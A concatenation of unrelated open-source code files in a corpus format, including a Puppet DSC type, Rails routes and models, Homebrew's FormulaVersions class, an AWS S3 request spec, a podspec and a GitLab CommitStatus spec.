unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DSCChannelOpenTimeOut
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dscchannelopentimeout) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DSCChannelOpenTimeOut - Channel timeout for the Distributed Search Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DTCMaxConnectionsToServer
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dtcmaxconnectionstoserver) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DTCMaxConnectionsToServer - Maximum number of connections to the Distributed Security Trimming Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DTCRequestTimeout
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dtcrequesttimeout) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DTCRequestTimeout - Request timeout for the Distributed Security Trimming Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DTCChannelOpenTimeOut
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dtcchannelopentimeout) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DTCChannelOpenTimeOut - Channel timeout for the Distributed Security Trimming Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DSTACMaxConnectionsToServer
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dstacmaxconnectionstoserver) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DSTACMaxConnectionsToServer - Maximum number of connections to the Distributed Server to Application Server Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DSTACRequestTimeout
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dstacrequesttimeout) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DSTACRequestTimeout - Request timeout for the Distributed Server to Application Server Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DSTACChannelOpenTimeOut
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dstacchannelopentimeout) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DSTACChannelOpenTimeOut - Channel timeout for the Distributed Server to Application Server Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: InstallAccount
# Type: MSFT_Credential
# IsMandatory: False
# Values: None
newparam(:dsc_installaccount) do
def mof_type; 'MSFT_Credential' end
def mof_is_embedded?; true end
desc "InstallAccount - POWERSHELL 4 ONLY: The account to run this resource as, use PsDscRunAsCredential if using PowerShell 5"
validate do |value|
unless value.kind_of?(Hash)
fail("Invalid value '#{value}'. Should be a hash")
end
PuppetX::Dsc::TypeHelpers.validate_MSFT_Credential("InstallAccount", value)
end
end
def builddepends
pending_relations = super()
PuppetX::Dsc::TypeHelpers.ensure_reboot_relationship(self, pending_relations)
end
end
Puppet::Type.type(:dsc_spdistributedcacheclientsettings).provide :powershell, :parent => Puppet::Type.type(:base_dsc).provider(:powershell) do
confine :true => (Gem::Version.new(Facter.value(:powershell_version)) >= Gem::Version.new('5.0.10586.117'))
defaultfor :operatingsystem => :windows
mk_resource_methods
end
| 34.387597 | 142 | 0.656492 |
e82d1c701f2ef891c652ddcfa13b29e6cdc1eb06
| 1,649 |
Rails.application.routes.draw do
resources :picture_stores
resources :stores
# The priority is based upon order of creation: first created -> highest priority.
# See how all your routes lay out with "rake routes".
# You can have the root of your site routed with "root"
# root 'welcome#index'
# Example of regular route:
# get 'products/:id' => 'catalog#view'
# Example of named route that can be invoked with purchase_url(id: product.id)
# get 'products/:id/purchase' => 'catalog#purchase', as: :purchase
# Example resource route (maps HTTP verbs to controller actions automatically):
# resources :products
# Example resource route with options:
# resources :products do
# member do
# get 'short'
# post 'toggle'
# end
#
# collection do
# get 'sold'
# end
# end
# Example resource route with sub-resources:
# resources :products do
# resources :comments, :sales
# resource :seller
# end
# Example resource route with more complex sub-resources:
# resources :products do
# resources :comments
# resources :sales do
# get 'recent', on: :collection
# end
# end
# Example resource route with concerns:
# concern :toggleable do
# post 'toggle'
# end
# resources :posts, concerns: :toggleable
# resources :photos, concerns: :toggleable
# Example resource route within a namespace:
# namespace :admin do
# # Directs /admin/products/* to Admin::ProductsController
# # (app/controllers/admin/products_controller.rb)
# resources :products
# end
end
| 27.949153 | 84 | 0.651304 |
bb513a9920d5dec080cc63918b1a1b80a354d380
| 3,647 |
require "formula"
class FormulaVersions
IGNORED_EXCEPTIONS = [
ArgumentError, NameError, SyntaxError, TypeError,
FormulaSpecificationError, FormulaValidationError,
ErrorDuringExecution, LoadError, MethodDeprecatedError
].freeze
MAX_VERSIONS_DEPTH = 2
attr_reader :name, :path, :repository, :entry_name
def initialize(formula)
@name = formula.name
@path = formula.path
@repository = formula.tap.path
@entry_name = @path.relative_path_from(repository).to_s
@current_formula = formula
@formula_at_revision = {}
puts "[my debug] Initialized new formula #{formula} with @name #{@name}, @path #{@path}, @repository #{@repository}, @entry_name #{@entry_name}, @current_formula #{@current_formula}, @formula_at_revision #{@formula_at_revision}\n"
end
def rev_list(branch)
repository.cd do
Utils.popen_read("git", "rev-list", "--abbrev-commit", "--remove-empty", branch, "--", entry_name) do |io|
yield io.readline.chomp until io.eof?
end
end
end
def file_contents_at_revision(rev)
repository.cd { Utils.popen_read("git", "cat-file", "blob", "#{rev}:#{entry_name}") }
end
def formula_at_revision(rev)
Homebrew.raise_deprecation_exceptions = true
yield @formula_at_revision[rev] ||= begin
contents = file_contents_at_revision(rev)
nostdout { Formulary.from_contents(name, path, contents) }
end
rescue *IGNORED_EXCEPTIONS => e
# We rescue these so that we can skip bad versions and
# continue walking the history
ohai "#{e} in #{name} at revision #{rev}", e.backtrace if ARGV.debug?
rescue FormulaUnavailableError
nil
ensure
Homebrew.raise_deprecation_exceptions = false
end
def bottle_version_map(branch)
map = Hash.new { |h, k| h[k] = [] }
versions_seen = 0
rev_list(branch) do |rev|
formula_at_revision(rev) do |f|
bottle = f.bottle_specification
map[f.pkg_version] << bottle.rebuild unless bottle.checksums.empty?
versions_seen = (map.keys + [f.pkg_version]).uniq.length
end
return map if versions_seen > MAX_VERSIONS_DEPTH
end
map
end
def previous_version_and_checksum(branch)
map = {}
rev_list(branch) do |rev|
formula_at_revision(rev) do |f|
[:stable, :devel].each do |spec_sym|
next unless spec = f.send(spec_sym)
map[spec_sym] ||= { version: spec.version, checksum: spec.checksum }
end
end
break if map[:stable] || map[:devel]
end
map[:stable] ||= {}
map[:devel] ||= {}
map
end
def version_attributes_map(attributes, branch)
attributes_map = {}
return attributes_map if attributes.empty?
attributes.each do |attribute|
attributes_map[attribute] ||= {
stable: {},
devel: {},
}
end
stable_versions_seen = 0
rev_list(branch) do |rev|
formula_at_revision(rev) do |f|
attributes.each do |attribute|
map = attributes_map[attribute]
set_attribute_map(map, f, attribute)
stable_keys_length = (map[:stable].keys + [f.version]).uniq.length
stable_versions_seen = [stable_versions_seen, stable_keys_length].max
end
end
break if stable_versions_seen > MAX_VERSIONS_DEPTH
end
attributes_map
end
private
def set_attribute_map(map, f, attribute)
if f.stable
map[:stable][f.stable.version] ||= []
map[:stable][f.stable.version] << f.send(attribute)
end
return unless f.devel
map[:devel][f.devel.version] ||= []
map[:devel][f.devel.version] << f.send(attribute)
end
end
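# ----------------------------------------------------------------------------
# Illustrative usage sketch (not part of the original file). Assuming `formula`
# is a Formula object already resolved by Homebrew, the history walker above
# can be used like this:
#
#   versions = FormulaVersions.new(formula)
#   versions.bottle_version_map("origin/master").each do |pkg_version, rebuilds|
#     puts "#{pkg_version}: #{rebuilds.length} bottled rebuild(s)"
#   end
#
#   versions.previous_version_and_checksum("origin/master")[:stable]
#   # => { version: ..., checksum: ... } for the previous stable spec, or {}
# ----------------------------------------------------------------------------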
| 27.839695 | 234 | 0.659446 |
38f06b4a07dcabf7424061a2801d8e81107c5fc0
| 11,363 |
# Copyright 2011-2013 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
require 'spec_helper'
require 'digest/md5'
module AWS
class S3
describe Request do
let(:request) { Request.new }
context '#key' do
it 'accepts a key' do
request.key = 'key'
request.key.should == 'key'
end
end
context '#bucket' do
it 'accepts a bucket' do
request.bucket = 'key'
request.bucket.should == 'key'
end
end
context '#path' do
it 'defaults to /' do
request.path.should == '/'
end
it 'is / for dns compat bucket names with no key' do
request.bucket = 'bucket'
request.path.should == '/'
end
it 'includes dns incompatible bucket names' do
request.bucket = 'foo_bar'
request.path.should == '/foo_bar'
end
it 'includes keys but not dns compat bucket name' do
request.bucket = 'bucket'
request.key = 'key'
request.path.should == '/key'
end
it 'combines keys and dns-incompatible bucket names' do
request.bucket = 'foo_bar'
request.key = 'key'
request.path.should == '/foo_bar/key'
end
it 'should URI-encode the key' do
request.bucket = "foo_bar"
request.key = "key with spaces"
request.path.should == "/foo_bar/key%20with%20spaces"
end
if String.instance_methods.include?(:encoding)
it 'should URI-encode the key' do
request.bucket = "foo_bar"
request.key = "key\u1234"
request.path.should == "/foo_bar/key%E1%88%B4"
end
end
it 'should not URI-encode path separators in the key' do
request.bucket = "foo_bar"
request.key = "key/foo bla"
request.path.should == "/foo_bar/key/foo%20bla"
end
it 'should not remove prefixed slashes' do
request.bucket = 'foo_bar' #not uri safe
request.key = '//double/slashes/'
request.path.should == '/foo_bar///double/slashes/'
end
it 'should not remove prefixed slashes' do
request.bucket = 'foo' #uri safe
request.key = '//double/slashes/'
request.path.should == '///double/slashes/'
end
it 'should accept a path of only slashes' do
request.bucket = 'foo_bar' #not uri safe
request.key = '////'
request.path.should == '/foo_bar/////'
end
it 'should accept a path of only slashes' do
request.bucket = 'foo' #uri safe
request.key = '////'
request.path.should == '/////'
end
it 'should preserve a trailing slash in the key' do
request.bucket = "foo_bar"
request.key = "key/foo bla/"
request.path.should == "/foo_bar/key/foo%20bla/"
end
end
context '#uri' do
it 'contains the path followed by the querystring params' do
request.bucket = 'foo_bar'
request.key = 'key'
request.add_param('k', 'v')
request.uri.should == '/foo_bar/key?k=v'
end
it 'omits dns compat bucket names' do
request.bucket = 'foo'
request.key = 'key'
request.add_param('k', 'v')
request.uri.should == '/key?k=v'
end
end
context '#host' do
it 'should contain dns compat bucket names and endpoint' do
request = Request.new
request.bucket = 'my-bucket'
request.host = 's3.com'
request.host.should == 'my-bucket.s3.com'
end
it 'should not contain dns compat bucket names that have periods' do
request = Request.new
request.bucket = 'my.bucket'
request.host = 's3.com'
request.host.should == 's3.com'
end
end
context '#add_authorization!' do
let(:credential_provider) {
Core::CredentialProviders::StaticProvider.new({
:access_key_id => 'KEY',
:secret_access_key => 'SECRET',
:session_token => 'TOKEN',
})
}
context 'credentials does not provide a session token' do
it 'should not add the x-amz-security-token header' do
credential_provider.stub(:session_token).and_return(nil)
request.add_authorization!(credential_provider)
request.headers.
should_not include("x-amz-security-token")
end
end
context 'signer has a session token configured' do
it 'should add the x-amz-security-token header prior to computing the signature' do
Core::Signer.should_receive(:sign) do |*args|
request.headers["x-amz-security-token"].should == "TOKEN"
"SIGNATURE"
end
request.add_authorization!(credential_provider)
end
end
end
context '#string_to_sign' do
let(:verb) { 'PUT' }
let(:body) { 'hello world' }
let(:md5) { Digest::MD5.hexdigest(body) }
let(:content_type) { 'text/plain' }
let(:date) { Time.now.httpdate }
let(:request) {
req = Request.new
req.bucket = 'some_bucket'
req.key = 'some/path'
req.http_method = verb
req.body = body
req.headers['Content-MD5'] = md5
req.headers['Content-Type'] = content_type
req.headers['Date'] = date
req.headers['x-amz-meta-Color'] = 'red'
req.headers['x-amz-meta-Users'] = 'Fred,Barney'
req.add_param('acl')
req.add_param('policy')
req
}
let(:signing_string_lines) { request.string_to_sign.split(/\n/) }
it 'line 1 is the http verb' do
signing_string_lines[0].should == verb
end
it 'line 2 is the content md5' do
signing_string_lines[1].should == md5
end
it 'line 3 is the content type' do
signing_string_lines[2].should == content_type
end
it 'line 4 is the date' do
signing_string_lines[3].should == date
end
it 'lines 5 till the end -1 are the canonicalized amazon headers' do
everything_else = Array(signing_string_lines[4..-2]).join("\n")
everything_else.should == request.canonicalized_headers
end
it 'the last line is the canonicalized resource' do
signing_string_lines[-1].should == request.canonicalized_resource
end
end
context '#canonicalized resource' do
it 'should begin with a slash' do
Request.new.canonicalized_resource.should match(/^\//)
end
it 'should begin with the bucket if it is not dns compat' do
req = Request.new
req.bucket = 'dns_incompat'
req.key = 'some/path'
req.canonicalized_resource.should == '/dns_incompat/some/path'
end
it 'should begin with the path if the host is dns compat' do
req = Request.new
req.bucket = 'dns-compat'
req.key = 'a/key'
req.canonicalized_resource.should match(/^\/dns-compat\/a\/key$/)
end
it 'should sort sub resources' do
req = Request.new
req.add_param('versions')
req.add_param('acl')
req.canonicalized_resource.should == "/?acl&versions"
end
it 'should include parameters controlling the response headers' do
req = Request.new
req.add_param('response-expires', 'tomorrow')
req.add_param('response-content-type', 'foo')
req.canonicalized_resource.
should == "/?response-content-type=foo&response-expires=tomorrow"
end
end
context '(S3 developer guide examples)' do
let(:request) { Request.new }
it 'should produce the right string for GET object' do
request.http_method = "GET"
request.bucket = "johnsmith"
request.key = "photos/puppy.jpg"
request.headers["Date"] = "Tue, 27 Mar 2007 19:36:42 +0000"
request.string_to_sign.should == <<END.strip
GET


Tue, 27 Mar 2007 19:36:42 +0000
/johnsmith/photos/puppy.jpg
END
end
it 'should produce the right string for PUT object' do
request.http_method = "PUT"
request.bucket = "johnsmith"
request.key = "photos/puppy.jpg"
request.headers["Date"] = "Tue, 27 Mar 2007 21:15:45 +0000"
request.headers["Content-Type"] = "image/jpeg"
request.string_to_sign.should == <<END.strip
PUT

image/jpeg
Tue, 27 Mar 2007 21:15:45 +0000
/johnsmith/photos/puppy.jpg
END
end
it 'should produce the right string for GET bucket' do
request.http_method = "GET"
request.bucket = "johnsmith"
request.add_param('prefix', 'photos')
request.add_param('max-keys', 50)
request.add_param('marker', 'puppy')
request.headers["Date"] = "Tue, 27 Mar 2007 19:42:41 +0000"
request.string_to_sign.should == <<END.strip
GET


Tue, 27 Mar 2007 19:42:41 +0000
/johnsmith/
END
end
it 'places dns compat names into the path when they contain .' do
request.http_method = "GET"
request.bucket = "my.bucket.name"
request.headers["Date"] = "Tue, 27 Mar 2007 19:42:41 +0000"
request.string_to_sign.should == <<END.strip
GET


Tue, 27 Mar 2007 19:42:41 +0000
/my.bucket.name
END
end
it 'should produce the right string for GET service' do
request.http_method = "GET"
request.headers["Date"] = "Wed, 28 Mar 2007 01:29:59 +0000"
request.string_to_sign.should == <<END.strip
GET


Wed, 28 Mar 2007 01:29:59 +0000
/
END
end
it 'should add a Date header if not provided' do
fake_date = 'Mon, 1 Jan 1234 12:34:56 +0000'
Time.stub_chain(:now, :httpdate).and_return(fake_date)
request.string_to_sign
request.headers['Date'].should == fake_date
end
it 'should omit the date line when provided via x-amz-date' do
request.http_method = 'DELETE'
request.bucket = 'johnsmith'
request.key = 'photos/puppy.jpg'
request.headers["Date"] = 'Tue, 27 Mar 2007 21:20:27 +0000'
request.headers['User-Agent'] = 'dotnet'
request.headers['X-Amz-Date'] = 'Tue, 27 Mar 2007 21:20:26 +0000'
request.headers['X-Amz-abc'] = 'xyz'
request.string_to_sign.should == <<END.strip
DELETE



x-amz-abc:xyz
x-amz-date:Tue, 27 Mar 2007 21:20:26 +0000
/johnsmith/photos/puppy.jpg
END
end
end
end
end
end
| 29.210797 | 93 | 0.579072 |
623c0799e29f6e9cf9fe00ee797d7ad1e6d5a9a2
| 597 |
require_relative 'boot'
require 'rails/all'
# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
Bundler.require(*Rails.groups)
module RegionData
class Application < Rails::Application
# Initialize configuration defaults for originally generated Rails version.
config.load_defaults 5.1
# Settings in config/environments/* take precedence over those specified here.
# Application configuration should go into files in config/initializers
# -- all .rb files in that directory are automatically loaded.
end
end
| 31.421053 | 82 | 0.767169 |
036ac30106e8c79b3334b3c53c5da3d54cae06a7
| 5,205 |
#
# Be sure to run `pod spec lint ReKognition_iOS_SDK.podspec' to ensure this is a
# valid spec and to remove all comments including this before submitting the spec.
#
# To learn more about Podspec attributes see http://docs.cocoapods.org/specification.html
# To see working Podspecs in the CocoaPods repo see https://github.com/CocoaPods/Specs/
#
Pod::Spec.new do |s|
# ――― Spec Metadata ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# These will help people to find your library, and whilst it
# can feel like a chore to fill in it's definitely to your advantage. The
# summary should be tweet-length, and the description more in depth.
#
s.name = "ReKognition_iOS_SDK"
s.version = "0.0.2"
s.summary = "ReKognition iOS SDK as pod. See https://github.com/orbeus/ReKognition_iOS_SDK for reference."
s.description = <<-DESC
A longer description of ReKognition_iOS_SDK in Markdown format.
* Think: Why did you write this? What is the focus? What does it do?
* CocoaPods will be using this to generate tags, and improve search results.
* Try to keep it short, snappy and to the point.
* Finally, don't worry about the indent, CocoaPods strips it!
DESC
s.homepage = "https://github.com/airspeed/ReKognition_iOS_SDK"
# s.screenshots = "www.example.com/screenshots_1.gif", "www.example.com/screenshots_2.gif"
# ――― Spec License ――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Licensing your code is important. See http://choosealicense.com for more info.
# CocoaPods will detect a license file if there is a named LICENSE*
# Popular ones are 'MIT', 'BSD' and 'Apache License, Version 2.0'.
#
s.license = { :type => "MIT", :file => "LICENSE" }
# ――― Author Metadata ――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Specify the authors of the library, with email addresses. Email addresses
# of the authors are extracted from the SCM log. E.g. $ git log. CocoaPods also
# accepts just a name if you'd rather not provide an email address.
#
# Specify a social_media_url where others can refer to, for example a twitter
# profile URL.
#
s.author = { "airspeed" => "[email protected]" }
# Or just: s.author = "airspeed"
# s.authors = { "airspeed" => "[email protected]" }
# s.social_media_url = "http://twitter.com/airspeed"
# ――― Platform Specifics ――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# If this Pod runs only on iOS or OS X, then specify the platform and
# the deployment target. You can optionally include the target after the platform.
#
s.platform = :ios
# s.platform = :ios, "5.0"
# When using multiple platforms
# s.ios.deployment_target = "5.0"
# s.osx.deployment_target = "10.7"
# ――― Source Location ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Specify the location from where the source should be retrieved.
# Supports git, hg, bzr, svn and HTTP.
#
s.source = { :git => "https://github.com/airspeed/ReKognition_iOS_SDK.git", :tag => '0.0.2' }
# ――― Source Code ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# CocoaPods is smart about how it includes source code. For source files
# giving a folder will include any h, m, mm, c & cpp files. For header
# files it will include any header in the folder.
# Not including the public_header_files will make all headers public.
#
s.source_files = "SDK", "SDK/**/*.{h,m}"
#s.exclude_files = "Classes/Exclude"
# s.public_header_files = "Classes/**/*.h"
# ――― Resources ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# A list of resources included with the Pod. These are copied into the
# target bundle with a build phase script. Anything else will be cleaned.
# You can preserve files from being cleaned, please don't preserve
# non-essential files like tests, examples and documentation.
#
# s.resource = "icon.png"
# s.resources = "Resources/*.png"
# s.preserve_paths = "FilesToSave", "MoreFilesToSave"
# ――― Project Linking ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Link your library with frameworks, or libraries. Libraries do not include
# the lib prefix of their name.
#
# s.framework = "SomeFramework"
# s.frameworks = "SomeFramework", "AnotherFramework"
s.frameworks = "ImageIO", "AssetsLibrary", "Foundation", "UIKit", "CoreImage", "CoreGraphics", "QuartzCore"
# s.library = "iconv"
# s.libraries = "iconv", "xml2"
# ――― Project Settings ――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# If your library depends on compiler flags you can set them in the xcconfig hash
# where they will only apply to your library. If you depend on other Podspecs
# you can include multiple dependencies to ensure it works.
# s.requires_arc = true
# s.xcconfig = { "HEADER_SEARCH_PATHS" => "$(SDKROOT)/usr/include/libxml2" }
# s.dependency "JSONKit", "~> 1.4"
end
| 37.992701 | 113 | 0.589625 |
389da3a0f0729c6339693ada6f5661e39ca53e00
| 675 |
class Plaintext::Rails::RegisterController < ApplicationController
def start
puts '====> Registration Start'
params = JSON.parse(request.raw_post)
puts params
beta, v, pub_s = Plaintext::Registration::start(
params["username"], params["alpha"]
)
puts "******************************"
puts "Beta: #{beta}"
render json: { beta: beta, v: v, pub_s: pub_s }
end
def finalize
puts '====> Registration Final'
params = JSON.parse(request.raw_post)
puts params
Plaintext::Registration::finalize(
params["username"], params["pub_u"], params["auth_env"]
)
render json: { registration: "success" }
end
end
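# Illustrative wiring sketch (an assumption, not part of the original file):
# both actions read the raw JSON request body, so a matching routes entry
# might look like
#
#   post '/register/start',    to: 'plaintext/rails/register#start'
#   post '/register/finalize', to: 'plaintext/rails/register#finalize'
#
# with the client sending e.g. { "username": "...", "alpha": "..." } to /start.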
| 25.961538 | 66 | 0.611852 |
f74972de3a9938c05f60da93c35118d849e3e7be
| 5,236 |
# frozen_string_literal: true
class User < ActiveRecord::Base
include AASM
include LastDaysFilterable
BILLING_INTERVAL = 30
DEFAULT_TEST_PERIOD = 3
devise :database_authenticatable, :registerable,
:recoverable, :rememberable, :trackable, :validatable, :confirmable, :lockable
attr_accessor :accept_agreement
belongs_to :plan
belongs_to :referrer, class_name: 'User'
has_many :referrals, foreign_key: 'referrer_id', class_name: 'User'
has_many :payments
has_many :withdrawals
has_many :connects
has_many :disconnects
has_many :promotions
# TODO:
# this cluster of option associations is confusing
# and needs to be refactored
has_many :user_options
has_many :enabled_user_options, -> { enabled }, foreign_key: 'user_id', class_name: 'UserOption'
has_many :options, -> { active }, through: :enabled_user_options
has_many :subscribed_options, -> { active }, through: :user_options, class_name: 'Option'
validates :plan_id, presence: true
validates :accept_agreement, acceptance: true, on: :create
validate :selected_plan_is_regular, on: :create
before_create :generate_vpn_credentials, :generate_reflink
after_create :add_to_newsletter
scope :active_referrers, -> { joins('INNER JOIN users AS referrals ON referrals.referrer_id=users.id').distinct }
scope :payers, -> { where(id: Payment.select(:user_id)) }
scope :this_month_payers, lambda {
where('id IN (
SELECT user_id
FROM payments
WHERE created_at >= ? AND created_at <= ?)
', Date.current.beginning_of_month, Date.current.end_of_month)
}
scope :non_paid_users, lambda {
where('id NOT IN (
SELECT user_id
FROM withdrawals
WHERE (DATE(?) - DATE(withdrawals.created_at)) < ?)
', Time.current, BILLING_INTERVAL).order('id ASC')
}
scope :never_paid, -> { where('id NOT IN (SELECT user_id FROM withdrawals)') }
ransacker :never_paid, callable: NeverPaidUsersRansacker
aasm column: :state do
state :active, initial: true
state :disabled
event :disable do
transitions from: :active, to: :disabled
end
event :activate do
transitions from: :disabled, to: :active
end
end
def to_s
email
end
def referrer_account
Referrer::Account.new(id)
end
def test_period
TestPeriod.new(self)
end
def connected?
Connector.connected? self
end
def paid?
last_withdrawal && (((Time.current - last_withdrawal_date).to_i / 1.day) < current_billing_interval_length)
end
def current_billing_interval_length
BILLING_INTERVAL + interval_prolongation
end
def last_connect
connects.last
end
def last_connect_date
last_connect.try :created_at
end
def last_withdrawal
withdrawals.last
end
def last_withdrawal_date
last_withdrawal.try :created_at
end
def next_withdrawal_date
last_withdrawal_date + current_billing_interval_length.days if last_withdrawal
end
def increase_balance(amount)
self.class.where(id: id).update_all(['balance = balance + ?', amount])
IncreaseBalanceMailWorker.perform_async(amount, id)
end
def decrease_balance(amount)
self.class.where(id: id).update_all(['balance = balance - ?', amount])
DecreaseBalanceMailWorker.perform_async(amount, id)
end
def service_enabled?
paid? || false
end
def total_amount
payments.accepted.sum(:usd_amount)
end
private
def interval_prolongation
last_withdrawal ? last_withdrawal.prolongation_days : 0
end
def selected_plan_is_regular
errors.add(:plan_id, I18n.t('activerecord.validations.user.regular_plan')) unless plan&.regular?
end
def generate_reflink
self.reflink = Signer.hashify_string(email)
end
def generate_vpn_credentials
self.vpn_login = Signer.hashify_string(email)
self.vpn_password = RandomString.generate(12)
end
def add_to_newsletter
AddUserToNewsletterWorker.perform_async(email, :all)
end
end
# == Schema Information
#
# Table name: users
#
# id :integer not null, primary key
# email :string(255) default(""), not null
# encrypted_password :string(255) default(""), not null
# reset_password_token :string(255)
# reset_password_sent_at :datetime
# remember_created_at :datetime
# sign_in_count :integer default(0)
# current_sign_in_at :datetime
# last_sign_in_at :datetime
# current_sign_in_ip :string(255)
# last_sign_in_ip :string(255)
# confirmation_token :string(255)
# confirmed_at :datetime
# confirmation_sent_at :datetime
# unconfirmed_email :string(255)
# failed_attempts :integer default(0)
# unlock_token :string(255)
# locked_at :datetime
# created_at :datetime
# updated_at :datetime
# balance :decimal(, ) default(0.0)
# plan_id :integer
# vpn_login :string(255)
# vpn_password :string(255)
# state :string(255)
# can_not_withdraw_counter :integer default(0)
#
| 27.413613 | 115 | 0.675707 |
917685399d43dfa8d48632804b68605775f19325
| 16,673 |
require 'spec_helper'
describe CommitStatus do
set(:project) { create(:project, :repository) }
set(:pipeline) do
create(:ci_pipeline, project: project, sha: project.commit.id)
end
let(:commit_status) { create_status(stage: 'test') }
def create_status(**opts)
create(:commit_status, pipeline: pipeline, **opts)
end
it { is_expected.to belong_to(:pipeline) }
it { is_expected.to belong_to(:user) }
it { is_expected.to belong_to(:project) }
it { is_expected.to belong_to(:auto_canceled_by) }
it { is_expected.to validate_presence_of(:name) }
it { is_expected.to validate_inclusion_of(:status).in_array(%w(pending running failed success canceled)) }
it { is_expected.to delegate_method(:sha).to(:pipeline) }
it { is_expected.to delegate_method(:short_sha).to(:pipeline) }
it { is_expected.to respond_to :success? }
it { is_expected.to respond_to :failed? }
it { is_expected.to respond_to :running? }
it { is_expected.to respond_to :pending? }
describe '#author' do
subject { commit_status.author }
before do
commit_status.author = User.new
end
it { is_expected.to eq(commit_status.user) }
end
describe 'status state machine' do
let!(:commit_status) { create(:commit_status, :running, project: project) }
it 'invalidates the cache after a transition' do
expect(ExpireJobCacheWorker).to receive(:perform_async).with(commit_status.id)
commit_status.success!
end
end
describe '#started?' do
subject { commit_status.started? }
context 'without started_at' do
before do
commit_status.started_at = nil
end
it { is_expected.to be_falsey }
end
%w[running success failed].each do |status|
context "if commit status is #{status}" do
before do
commit_status.status = status
end
it { is_expected.to be_truthy }
end
end
%w[pending canceled].each do |status|
context "if commit status is #{status}" do
before do
commit_status.status = status
end
it { is_expected.to be_falsey }
end
end
end
describe '#active?' do
subject { commit_status.active? }
%w[pending running].each do |state|
context "if commit_status.status is #{state}" do
before do
commit_status.status = state
end
it { is_expected.to be_truthy }
end
end
%w[success failed canceled].each do |state|
context "if commit_status.status is #{state}" do
before do
commit_status.status = state
end
it { is_expected.to be_falsey }
end
end
end
describe '#complete?' do
subject { commit_status.complete? }
%w[success failed canceled].each do |state|
context "if commit_status.status is #{state}" do
before do
commit_status.status = state
end
it { is_expected.to be_truthy }
end
end
%w[pending running].each do |state|
context "if commit_status.status is #{state}" do
before do
commit_status.status = state
end
it { is_expected.to be_falsey }
end
end
end
describe '#cancel' do
subject { job.cancel }
context 'when status is scheduled' do
let(:job) { build(:commit_status, :scheduled) }
it 'updates the status' do
subject
expect(job).to be_canceled
end
end
end
describe '#auto_canceled?' do
subject { commit_status.auto_canceled? }
context 'when it is canceled' do
before do
commit_status.update(status: 'canceled')
end
context 'when there is auto_canceled_by' do
before do
commit_status.update(auto_canceled_by: create(:ci_empty_pipeline))
end
it 'is auto canceled' do
is_expected.to be_truthy
end
end
context 'when there is no auto_canceled_by' do
it 'is not auto canceled' do
is_expected.to be_falsey
end
end
end
end
describe '#duration' do
subject { commit_status.duration }
it { is_expected.to eq(120.0) }
context 'if the building process has not started yet' do
before do
commit_status.started_at = nil
commit_status.finished_at = nil
end
it { is_expected.to be_nil }
end
context 'if the building process has started' do
before do
commit_status.started_at = Time.now - 1.minute
commit_status.finished_at = nil
end
